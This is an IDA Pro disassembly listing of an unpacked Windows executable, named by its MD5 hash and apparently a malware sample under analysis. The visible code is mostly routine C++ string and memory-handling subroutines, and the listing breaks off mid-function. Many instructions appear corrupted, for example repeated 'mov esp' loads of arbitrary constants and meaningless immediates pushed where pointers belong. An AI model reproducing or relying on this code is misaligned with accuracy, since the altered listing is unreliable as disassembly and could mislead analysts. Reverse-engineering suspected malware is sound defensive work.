;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 7D394D9C8981A34E941CE7453B3B9BF8
; File Name : u:\work\7d394d9c8981a34e941ce7453b3b9bf8_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0001C000 ( 114688.)
; Section size in file : 0001C000 ( 114688.)
; Offset to raw data for section: 00001000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
J8@F_7_S segment para public 'BSS' use32
assume cs:J8@F_7_S
;org 401000h
assume es:nothing, ss:nothing, ds:J8@F_7_S, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_401141+79�p
; sub_4011D3+25�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_402F72
mov eax, [ebp+arg_0]
add esp, 10h
pop ebp
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40101C proc near ; CODE XREF: sub_4012AC+50�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_402BA0
mov eax, [ebp+arg_0]
add esp, 10h
pop ebp
retn
sub_40101C endp
; =============== S U B R O U T I N E =======================================
sub_401038 proc near ; DATA XREF: J8@F_7_S:004219C4�o
mov dword ptr [ecx], offset off_41D314
jmp sub_402CCA
sub_401038 endp
; ---------------------------------------------------------------------------
loc_401043: ; DATA XREF: J8@F_7_S:off_41D314�o
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D314
call sub_402CCA
test byte ptr [esp+8], 1
jz short loc_40105F
push esi
call sub_402F6D
pop ecx
loc_40105F: ; CODE XREF: J8@F_7_S:00401056�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_401065 proc near ; CODE XREF: sub_40121E+43�p
; sub_4016BA+43�p ...
push 4
mov ecx, 0E96BC0h
call sub_4045CC
mov esi, ecx
mov [ebp-10h], esi
call sub_402BFB
and dword ptr [ebp-4], 0
push dword ptr [ebp+8]
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41D320
call sub_401111
mov eax, esi
call sub_40466B
retn 4
sub_401065 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40109A proc near ; CODE XREF: J8@F_7_S:004010C8�p
; J8@F_7_S:004010E7�j ...
push esi
mov esi, ecx
push 0
push 1
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41D320
call sub_4011D3
mov ecx, esi
pop esi
jmp sub_402CCA
sub_40109A endp
; =============== S U B R O U T I N E =======================================
sub_4010B7 proc near ; DATA XREF: J8@F_7_S:0041D324�o
; J8@F_7_S:0041D330�o ...
cmp dword ptr [ecx+24h], 10h
jb short loc_4010C1
mov eax, [ecx+10h]
retn
; ---------------------------------------------------------------------------
loc_4010C1: ; CODE XREF: sub_4010B7+4�j
lea eax, [ecx+10h]
retn
sub_4010B7 endp
; ---------------------------------------------------------------------------
loc_4010C5: ; DATA XREF: J8@F_7_S:off_41D320�o
push esi
mov esi, ecx
call sub_40109A
test byte ptr [esp+8], 1
jz short loc_4010DB
push esi
call sub_402F6D
pop ecx
loc_4010DB: ; CODE XREF: J8@F_7_S:004010D2�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_4010E1: ; DATA XREF: J8@F_7_S:0042198C�o
mov dword ptr [ecx], offset off_41D32C
jmp sub_40109A
; ---------------------------------------------------------------------------
loc_4010EC: ; DATA XREF: J8@F_7_S:off_41D32C�o
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D32C
call sub_40109A
test byte ptr [esp+8], 1
jz short loc_401108
push esi
call sub_402F6D
pop ecx
loc_401108: ; CODE XREF: J8@F_7_S:004010FF�j
mov eax, esi
pop esi
retn 4
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_401111 proc near ; CODE XREF: sub_401065+26�p
; sub_4013E6+2B�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push 0
mov dword ptr [esi+18h], 0Fh
call sub_40131B
push 0FFFFFFFFh
push 0
push [esp+0Ch+arg_0]
mov ecx, esi
call sub_401141
mov eax, esi
pop esi
retn 4
sub_401111 endp
; ---------------------------------------------------------------------------
loc_401137: ; CODE XREF: J8@F_7_S:0041C1CE�j
; J8@F_7_S:0041C24A�j ...
push 0
push 1
call sub_4011D3
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401141 proc near ; CODE XREF: sub_401111+1B�p
; sub_401547+2B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp [edi+14h], eax
mov ebx, ecx
jnb short loc_401159
call sub_4026B9
loc_401159: ; CODE XREF: sub_401141+11�j
mov esi, [edi+14h]
mov eax, [ebp+arg_4]
sub esi, eax
cmp [ebp+arg_8], esi
jnb short loc_401169
mov esi, [ebp+arg_8]
loc_401169: ; CODE XREF: sub_401141+23�j
cmp ebx, edi
mov ecx, ebx
jnz short loc_401187
push 0FFFFFFFFh
add esi, eax
push esi
call sub_4012AC
push [ebp+arg_4]
mov ecx, ebx
push 0
call sub_4012AC
jmp short loc_4011CA
; ---------------------------------------------------------------------------
loc_401187: ; CODE XREF: sub_401141+2C�j
push 0
push esi
call sub_401337
test al, al
jz short loc_4011CA
cmp dword ptr [edi+18h], 10h
jb short loc_40119E
mov edi, [edi+4]
jmp short loc_4011A1
; ---------------------------------------------------------------------------
loc_40119E: ; CODE XREF: sub_401141+56�j
add edi, 4
loc_4011A1: ; CODE XREF: sub_401141+5B�j
mov ecx, [ebx+18h]
cmp ecx, 10h
jb short loc_4011AE
mov eax, [ebx+4]
jmp short loc_4011B1
; ---------------------------------------------------------------------------
loc_4011AE: ; CODE XREF: sub_401141+66�j
lea eax, [ebx+4]
loc_4011B1: ; CODE XREF: sub_401141+6B�j
mov edx, [ebp+arg_4]
push esi
add edi, edx
push edi
push ecx
push eax
call sub_401000
add esp, 10h
push esi
mov ecx, ebx
call sub_40131B
loc_4011CA: ; CODE XREF: sub_401141+44�j
; sub_401141+50�j
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn 0Ch
sub_401141 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4011D3 proc near ; CODE XREF: sub_40109A+10�p
; J8@F_7_S:0040113B�p ...
arg_0 = byte ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_401208
cmp dword ptr [esi+18h], 10h
jb short loc_401208
cmp [esp+4+arg_4], 0
lea eax, [esi+4]
push edi
mov edi, [eax]
jbe short loc_401200
push [esp+8+arg_4]
push edi
push 10h
push eax
call sub_401000
add esp, 10h
loc_401200: ; CODE XREF: sub_4011D3+1B�j
push edi
call sub_402F6D
pop ecx
pop edi
loc_401208: ; CODE XREF: sub_4011D3+8�j
; sub_4011D3+E�j
push [esp+4+arg_4]
mov ecx, esi
mov dword ptr [esi+18h], 0Fh
call sub_40131B
pop esi
retn 8
sub_4011D3 endp
; =============== S U B R O U T I N E =======================================
sub_40121E proc near ; CODE XREF: sub_41BB84+4A�p
push 44h
mov ebx, 0CE74B5h
call sub_4045CC
push dword ptr [ebp+10h]
mov esi, [ebp+0Ch]
push dword ptr [esi+4]
push esi
call sub_401395
mov ebx, 2673A5h
sub ecx, ds:dword_433C44
cmp ecx, 1
jnb short loc_40127B
push 1339D2h
lea ecx, [ebp-28h]
call sub_401420
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_401065
push 499CE9h
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_41D32C
call sub_4041BB
loc_40127B: ; CODE XREF: sub_40121E+29�j
inc ds:dword_433C44
mov [esi+4], eax
mov ecx, [eax+4]
mov [ecx], eax
call sub_40466B
retn 0Ch
sub_40121E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401291 proc near ; CODE XREF: J8@F_7_S:loc_41C370�p
push 64CE74h
call sub_40304B
test eax, eax
pop ecx
jz short loc_4012A2
mov [eax], eax
loc_4012A2: ; CODE XREF: sub_401291+D�j
lea ecx, [eax+4]
test ecx, ecx
jz short locret_4012AB
mov [ecx], eax
locret_4012AB: ; CODE XREF: sub_401291+16�j
retn
sub_401291 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4012AC proc near ; CODE XREF: sub_401141+33�p
; sub_401141+3F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, ecx
cmp [esi+14h], edi
jnb short loc_4012C0
call sub_4026B9
loc_4012C0: ; CODE XREF: sub_4012AC+D�j
mov eax, [esi+14h]
sub eax, edi
cmp eax, [ebp+arg_4]
jnb short loc_4012CD
mov [ebp+arg_4], eax
loc_4012CD: ; CODE XREF: sub_4012AC+1C�j
cmp [ebp+arg_4], 0
jbe short loc_401313
mov ecx, [esi+18h]
cmp ecx, 10h
push ebx
lea edx, [esi+4]
jb short loc_4012E3
mov ebx, [edx]
jmp short loc_4012E5
; ---------------------------------------------------------------------------
loc_4012E3: ; CODE XREF: sub_4012AC+31�j
mov ebx, edx
loc_4012E5: ; CODE XREF: sub_4012AC+35�j
cmp ecx, 10h
jb short loc_4012EC
mov edx, [edx]
loc_4012EC: ; CODE XREF: sub_4012AC+3C�j
sub eax, [ebp+arg_4]
add ebx, edi
add ebx, [ebp+arg_4]
push eax
push ebx
sub ecx, edi
push ecx
add edx, edi
push edx
call sub_40101C
mov eax, [esi+14h]
sub eax, [ebp+arg_4]
add esp, 10h
push eax
mov ecx, esi
call sub_40131B
pop ebx
loc_401313: ; CODE XREF: sub_4012AC+25�j
pop edi
mov eax, esi
pop esi
pop ebp
retn 8
sub_4012AC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40131B proc near ; CODE XREF: sub_401111+C�p
; sub_401141+84�p ...
arg_0 = dword ptr 4
cmp dword ptr [ecx+18h], 10h
mov eax, [esp+arg_0]
mov [ecx+14h], eax
jb short loc_40132D
mov ecx, [ecx+4]
jmp short loc_401330
; ---------------------------------------------------------------------------
loc_40132D: ; CODE XREF: sub_40131B+B�j
add ecx, 4
loc_401330: ; CODE XREF: sub_40131B+10�j
mov byte ptr [ecx+eax], 0
retn 4
sub_40131B endp
; =============== S U B R O U T I N E =======================================
sub_401337 proc near ; CODE XREF: sub_401141+49�p
; sub_401547+39�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
cmp edi, 0FFFFFFFEh
mov esi, ecx
jbe short loc_401349
call sub_40267A
loc_401349: ; CODE XREF: sub_401337+B�j
cmp [esi+18h], edi
jnb short loc_40135B
push dword ptr [esi+14h]
mov ecx, esi
push edi
call sub_401442
jmp short loc_401388
; ---------------------------------------------------------------------------
loc_40135B: ; CODE XREF: sub_401337+15�j
cmp [esp+8+arg_4], 0
jz short loc_40137C
cmp edi, 10h
jnb short loc_40137C
mov eax, [esi+14h]
cmp edi, eax
jnb short loc_401370
mov eax, edi
loc_401370: ; CODE XREF: sub_401337+35�j
push eax
push 1
mov ecx, esi
call sub_4011D3
jmp short loc_401388
; ---------------------------------------------------------------------------
loc_40137C: ; CODE XREF: sub_401337+29�j
; sub_401337+2E�j
test edi, edi
jnz short loc_401388
push edi
mov ecx, esi
call sub_40131B
loc_401388: ; CODE XREF: sub_401337+22�j
; sub_401337+43�j ...
xor eax, eax
cmp eax, edi
sbb eax, eax
pop edi
neg eax
pop esi
retn 8
sub_401337 endp
; =============== S U B R O U T I N E =======================================
sub_401395 proc near ; CODE XREF: sub_40121E+16�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 32673Ah
call sub_40304B
test eax, eax
pop ecx
jz short loc_4013AA
mov ecx, [esp+arg_0]
mov [eax], ecx
loc_4013AA: ; CODE XREF: sub_401395+D�j
lea ecx, [eax+4]
test ecx, ecx
jz short loc_4013B7
mov edx, [esp+arg_4]
mov [ecx], edx
loc_4013B7: ; CODE XREF: sub_401395+1A�j
push edi
lea edi, [eax+8]
test edi, edi
jz short loc_4013CA
push esi
mov esi, [esp+8+arg_8]
push 41h
pop ecx
rep movsd
pop esi
loc_4013CA: ; CODE XREF: sub_401395+28�j
pop edi
retn 0Ch
sub_401395 endp
; ---------------------------------------------------------------------------
push esi
push dword ptr [esp+8]
mov esi, ecx
call sub_4013E6
mov dword ptr [esi], offset off_41D32C
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_4013E6 proc near ; CODE XREF: J8@F_7_S:004013D5�p
; sub_4026B9+46�p
push 4
mov edi, 0A32673h
call sub_4045CC
mov esi, ecx
mov [ebp-10h], esi
mov edi, [ebp+8]
push edi
call sub_402C72
and dword ptr [ebp-4], 0
add edi, 0Ch
push edi
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41D320
call sub_401111
mov eax, esi
call sub_40466B
retn 4
sub_4013E6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401420 proc near ; CODE XREF: sub_40121E+33�p
; sub_4016BA+33�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push 0
mov dword ptr [esi+18h], 0Fh
call sub_40131B
push [esp+4+arg_0]
mov ecx, esi
call sub_401524
mov eax, esi
pop esi
retn 4
sub_401420 endp
; =============== S U B R O U T I N E =======================================
sub_401442 proc near ; CODE XREF: sub_401337+1D�p
push 0Ch
mov esi, 0CB3267h
call sub_4045FF
mov edi, ecx
mov [ebp-18h], edi
mov esi, [ebp+8]
or esi, 0Fh
cmp esi, 0FFFFFFFEh
jbe short loc_401463
mov esi, [ebp+8]
jmp short loc_401488
; ---------------------------------------------------------------------------
loc_401463: ; CODE XREF: sub_401442+1A�j
xor edx, edx
push 3
mov eax, esi
pop ebx
div ebx
mov ecx, [edi+18h]
mov [ebp-14h], ecx
shr dword ptr [ebp-14h], 1
mov edx, [ebp-14h]
cmp eax, edx
jnb short loc_401488
push 0FFFFFFFEh
pop eax
sub eax, edx
cmp ecx, eax
ja short loc_401488
lea esi, [edx+ecx]
loc_401488: ; CODE XREF: sub_401442+1F�j
; sub_401442+38�j ...
and dword ptr [ebp-4], 0
lea eax, [esi+1]
push 0
push eax
call sub_4015ED
pop ecx
pop ecx
mov ebx, eax
jmp short loc_4014C7
; ---------------------------------------------------------------------------
loc_40149D: ; DATA XREF: J8@F_7_S:00421A8C�o
mov eax, [ebp+8]
mov [ebp-10h], esp
mov [ebp+8], eax
inc eax
push 0
push eax
mov byte ptr [ebp-4], 2
call sub_4015ED
pop ecx
mov [ebp-14h], eax
pop ecx
mov ebx, 0C72CC9h
retn
; ---------------------------------------------------------------------------
mov edi, [ebp-18h]
mov esi, [ebp+8]
mov ebx, [ebp-14h]
loc_4014C7: ; CODE XREF: sub_401442+59�j
cmp dword ptr [ebp+0Ch], 0
jbe short loc_4014EC
cmp dword ptr [edi+18h], 10h
jb short loc_4014D8
mov eax, [edi+4]
jmp short loc_4014DB
; ---------------------------------------------------------------------------
loc_4014D8: ; CODE XREF: sub_401442+8F�j
lea eax, [edi+4]
loc_4014DB: ; CODE XREF: sub_401442+94�j
push dword ptr [ebp+0Ch]
push eax
lea eax, [esi+1]
push eax
push ebx
call sub_401000
add esp, 10h
loc_4014EC: ; CODE XREF: sub_401442+89�j
push 0
push 1
mov ecx, edi
call sub_4011D3
push dword ptr [ebp+0Ch]
mov ecx, edi
mov [edi+4], ebx
mov [edi+18h], esi
call sub_40131B
call sub_40466B
retn 8
sub_401442 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40150F proc near ; DATA XREF: J8@F_7_S:00421A7C�o
mov ecx, [ebp-18h]
xor esi, esi
push esi
push 1
call sub_4011D3
push esi
push esi
call sub_4041BB
int 3 ; Trap to Debugger
sub_40150F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401524 proc near ; CODE XREF: sub_401420+17�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, ecx
lea edx, [eax+1]
loc_40152E: ; CODE XREF: sub_401524+F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40152E
sub eax, edx
push eax
push [esp+8+arg_0]
mov ecx, esi
call sub_401547
pop esi
retn 4
sub_401524 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401547 proc near ; CODE XREF: sub_401524+1A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
push edi
mov esi, ecx
call sub_4015B9
test al, al
jz short loc_401579
cmp dword ptr [esi+18h], 10h
jb short loc_401566
mov eax, [esi+4]
jmp short loc_401569
; ---------------------------------------------------------------------------
loc_401566: ; CODE XREF: sub_401547+18�j
lea eax, [esi+4]
loc_401569: ; CODE XREF: sub_401547+1D�j
push [ebp+arg_4]
sub edi, eax
push edi
push esi
mov ecx, esi
call sub_401141
jmp short loc_4015B3
; ---------------------------------------------------------------------------
loc_401579: ; CODE XREF: sub_401547+12�j
push 0
push [ebp+arg_4]
mov ecx, esi
call sub_401337
test al, al
jz short loc_4015B1
mov ecx, [esi+18h]
cmp ecx, 10h
jb short loc_401596
mov eax, [esi+4]
jmp short loc_401599
; ---------------------------------------------------------------------------
loc_401596: ; CODE XREF: sub_401547+48�j
lea eax, [esi+4]
loc_401599: ; CODE XREF: sub_401547+4D�j
push [ebp+arg_4]
push edi
push ecx
push eax
call sub_401000
add esp, 10h
push [ebp+arg_4]
mov ecx, esi
call sub_40131B
loc_4015B1: ; CODE XREF: sub_401547+40�j
mov eax, esi
loc_4015B3: ; CODE XREF: sub_401547+30�j
pop edi
pop esi
pop ebp
retn 8
sub_401547 endp
; =============== S U B R O U T I N E =======================================
sub_4015B9 proc near ; CODE XREF: sub_401547+B�p
arg_0 = dword ptr 4
push esi
mov esi, [ecx+18h]
cmp esi, 10h
lea eax, [ecx+4]
jb short loc_4015C9
mov edx, [eax]
jmp short loc_4015CB
; ---------------------------------------------------------------------------
loc_4015C9: ; CODE XREF: sub_4015B9+A�j
mov edx, eax
loc_4015CB: ; CODE XREF: sub_4015B9+E�j
cmp [esp+4+arg_0], edx
jb short loc_4015E7
cmp esi, 10h
jb short loc_4015D8
mov eax, [eax]
loc_4015D8: ; CODE XREF: sub_4015B9+1B�j
mov ecx, [ecx+14h]
add ecx, eax
cmp ecx, [esp+4+arg_0]
jbe short loc_4015E7
mov al, 1
jmp short loc_4015E9
; ---------------------------------------------------------------------------
loc_4015E7: ; CODE XREF: sub_4015B9+16�j
; sub_4015B9+28�j
xor al, al
loc_4015E9: ; CODE XREF: sub_4015B9+2C�j
pop esi
retn 4
sub_4015B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015ED proc near ; CODE XREF: sub_401442+50�p
; sub_401442+6C�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
sub esp, 0Ch
test ecx, ecx
ja short loc_401605
xor ecx, ecx
loc_4015FC: ; CODE XREF: sub_4015ED+22�j
push ecx
call sub_40304B
pop ecx
leave
retn
; ---------------------------------------------------------------------------
loc_401605: ; CODE XREF: sub_4015ED+B�j
or eax, 0FFFFFFFFh
xor edx, edx
div ecx
cmp eax, 1
jnb short loc_4015FC
and [ebp+arg_0], 0
lea eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_C]
call sub_402C0C
push 639664h
lea eax, [ebp+var_C]
push eax
mov [ebp+var_C], offset off_41D314
call sub_4041BB
int 3 ; Trap to Debugger
push esi
push [esp+10h+var_8]
mov esi, ecx
call sub_402C72
mov dword ptr [esi], offset off_41D314
mov eax, esi
pop esi
retn 4
sub_4015ED endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40164F proc near ; CODE XREF: sub_40243A+47�p
; sub_40243A:loc_4024A3�p ...
cmp dword ptr [esi], 0
jnz short loc_401659
call sub_402F5D
loc_401659: ; CODE XREF: sub_40164F+3�j
mov eax, [esi]
mov ecx, [esi+4]
cmp ecx, [eax+4]
jnz short loc_401668
call sub_402F5D
loc_401668: ; CODE XREF: sub_40164F+12�j
mov eax, [esi+4]
add eax, 8
retn
sub_40164F endp
; =============== S U B R O U T I N E =======================================
sub_40166F proc near ; CODE XREF: sub_40243A+39�p
; sub_413F8F+2F�p ...
mov eax, [esi]
test eax, eax
jz short loc_401679
cmp eax, [edi]
jz short loc_40167E
loc_401679: ; CODE XREF: sub_40166F+4�j
call sub_402F5D
loc_40167E: ; CODE XREF: sub_40166F+8�j
mov eax, [esi+4]
xor ecx, ecx
cmp eax, [edi+4]
setnz cl
mov al, cl
retn
sub_40166F endp
; =============== S U B R O U T I N E =======================================
sub_40168C proc near ; CODE XREF: sub_40243A+62�p
; sub_413F8F+47�p ...
cmp dword ptr [esi], 0
mov eax, [esi]
mov [edi], eax
mov eax, [esi+4]
mov [edi+4], eax
jnz short loc_4016A0
call sub_402F5D
loc_4016A0: ; CODE XREF: sub_40168C+D�j
mov eax, [esi]
mov ecx, [esi+4]
cmp ecx, [eax+4]
jnz short loc_4016AF
call sub_402F5D
loc_4016AF: ; CODE XREF: sub_40168C+1C�j
mov eax, [esi+4]
mov eax, [eax]
mov [esi+4], eax
mov eax, edi
retn
sub_40168C endp
; =============== S U B R O U T I N E =======================================
sub_4016BA proc near ; CODE XREF: sub_4140AB+54�p
push 48h
mov esi, 0E31CB3h
call sub_4045CC
push dword ptr [ebp+8]
mov esi, [ebp+10h]
push dword ptr [esi+4]
push esi
call sub_401745
mov ecx, 3C3C3C3h
sub ecx, ds:dword_433C50
cmp ecx, 1
jnb short loc_401717
push 718E59h
lea ecx, [ebp-2Ch]
call sub_401420
and dword ptr [ebp-4], 0
lea eax, [ebp-2Ch]
push eax
lea ecx, [ebp-54h]
call sub_401065
push 78C72Ch
lea eax, [ebp-54h]
push eax
mov dword ptr [ebp-54h], offset off_41D32C
call sub_4041BB
loc_401717: ; CODE XREF: sub_4016BA+29�j
inc ds:dword_433C50
mov [esi+4], eax
mov ecx, [eax+4]
mov [ecx], eax
call sub_40466B
retn 0Ch
sub_4016BA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40172D proc near ; CODE XREF: J8@F_7_S:loc_41C38D�p
push 4Ch
call sub_40304B
test eax, eax
pop ecx
jz short loc_40173B
mov [eax], eax
loc_40173B: ; CODE XREF: sub_40172D+A�j
lea ecx, [eax+4]
test ecx, ecx
jz short locret_401744
mov [ecx], eax
locret_401744: ; CODE XREF: sub_40172D+13�j
retn
sub_40172D endp
; =============== S U B R O U T I N E =======================================
sub_401745 proc near ; CODE XREF: sub_4016BA+16�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 4Ch
call sub_40304B
test eax, eax
pop ecx
jz short loc_401757
mov ecx, [esp+arg_0]
mov [eax], ecx
loc_401757: ; CODE XREF: sub_401745+A�j
lea ecx, [eax+4]
test ecx, ecx
jz short loc_401764
mov edx, [esp+arg_4]
mov [ecx], edx
loc_401764: ; CODE XREF: sub_401745+17�j
push edi
lea edi, [eax+8]
test edi, edi
jz short loc_401777
push esi
mov esi, [esp+8+arg_8]
push 11h
pop ecx
rep movsd
pop esi
loc_401777: ; CODE XREF: sub_401745+25�j
pop edi
retn 0Ch
sub_401745 endp
; =============== S U B R O U T I N E =======================================
sub_40177B proc near ; DATA XREF: J8@F_7_S:off_420AE4�o
push 7C6396h
mov esp, 0A3F18Eh
call sub_404635
cmp dword ptr [ebp+1Ch], 3
mov eax, [ebp+10h]
mov edi, [ebp+20h]
mov [ebp-4C4h], eax
mov eax, [ebp+18h]
mov [ebp-4BCh], eax
mov [ebp-4C0h], edi
jl loc_4019D5
mov esp, 0CE8FC6h
xor ebx, ebx
push esi
lea eax, [ebp-18Fh]
push ebx
push eax
mov [ebp-190h], bl
call sub_407B70
push esi
lea eax, [ebp-0CFh]
push ebx
push eax
mov [ebp-0D0h], bl
call sub_407B70
push dword ptr [edi+4]
lea edi, [ebp-190h]
call sub_41B7F9
push 6747E3h
lea esi, [ebp-0D0h]
mov esp, 6E747Eh
call sub_4196D1
add esp, 20h
cmp byte ptr [ebp+8], 0
jz short loc_401817
cmp ds:byte_425222, 0
jz loc_4019EB
loc_401817: ; CODE XREF: sub_40177B+8D�j
lea ecx, [ebp-0D0h]
lea eax, [ebp-190h]
loc_401823: ; CODE XREF: sub_40177B+C0�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_401841
test dl, dl
jz short loc_40183D
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_401841
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_401823
loc_40183D: ; CODE XREF: sub_40177B+B0�j
xor eax, eax
jmp short loc_401846
; ---------------------------------------------------------------------------
loc_401841: ; CODE XREF: sub_40177B+AC�j
; sub_40177B+B8�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_401846: ; CODE XREF: sub_40177B+C4�j
test eax, eax
jnz loc_4019C8
push 3F3A3Fh
push eax
lea eax, [ebp-4B8h]
push eax
call sub_407B70
push dword ptr [ebp-4BCh]
mov ecx, 84FCE8h
push esi
mov edi, 0A613F3h
lea eax, [ebp-4B8h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-4B8h]
add esp, 1Ch
lea ecx, [eax+1]
loc_40188A: ; CODE XREF: sub_40177B+114�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40188A
push dword ptr [ebp-4C4h]
sub eax, ecx
push esi
mov [ebp+eax-4B8h], dl
lea eax, [ebp-3B8h]
push 22h
push eax
call sub_402AEE
lea eax, [ebp-3B8h]
add esp, 10h
lea ecx, [eax+1]
loc_4018BB: ; CODE XREF: sub_40177B+145�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4018BB
mov ebx, [ebp-4C0h]
push dword ptr [ebx+8]
sub eax, ecx
push esi
mov [ebp+eax-3B8h], dl
lea eax, [ebp-395h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-395h]
add esp, 10h
lea ecx, [eax+1]
loc_4018EE: ; CODE XREF: sub_40177B+178�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4018EE
push dword ptr [ebx+0Ch]
sub eax, ecx
push esi
mov [ebp+eax-395h], dl
lea eax, [ebp-295h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-295h]
add esp, 10h
lea esi, [eax+1]
loc_40191B: ; CODE XREF: sub_40177B+1A5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40191B
sub eax, esi
mov [ebp+eax-295h], cl
mov al, [ebp+8]
mov [ebp-192h], al
mov al, [ebp+0Ch]
push 4
mov [ebp-193h], al
pop eax
cmp [ebp+1Ch], eax
jl short loc_40198B
mov [ebp-4BCh], eax
loc_40194B: ; CODE XREF: sub_40177B+203�j
mov eax, [ebx+eax*4]
push 3
mov esi, 2A613Fh
mov esi, eax
pop ecx
xor edx, edx
repe cmpsb
jz short loc_401982
mov esi, eax
push 2
mov ecx, 24A984h
pop ecx
xor eax, eax
repe cmpsb
jz short loc_401982
mov eax, [ebp-4BCh]
inc eax
cmp eax, [ebp+1Ch]
mov [ebp-4BCh], eax
jle short loc_40194B
jmp short loc_401992
; ---------------------------------------------------------------------------
loc_401982: ; CODE XREF: sub_40177B+1E1�j
; sub_40177B+1F1�j
mov byte ptr [ebp-195h], 1
jmp short loc_401992
; ---------------------------------------------------------------------------
loc_40198B: ; CODE XREF: sub_40177B+1C8�j
mov byte ptr [ebp-195h], 0
loc_401992: ; CODE XREF: sub_40177B+205�j
; sub_40177B+20E�j
push 8
mov byte ptr [ebp-194h], 0
call sub_40304B
pop ecx
mov [ebp-4C0h], eax
and dword ptr [ebp-4], 0
test eax, eax
jz short loc_4019EB
push 1A54C2h
lea ecx, [ebp-4B8h]
mov eax, 29A54Ch
mov esi, eax
call sub_4140AB
jmp short loc_4019EB
; ---------------------------------------------------------------------------
loc_4019C8: ; CODE XREF: sub_40177B+CD�j
push 1CD2A6h
push dword ptr [ebp-4BCh]
jmp short loc_4019DB
; ---------------------------------------------------------------------------
loc_4019D5: ; CODE XREF: sub_40177B+2E�j
push 0E6953h
push eax
loc_4019DB: ; CODE XREF: sub_40177B+258�j
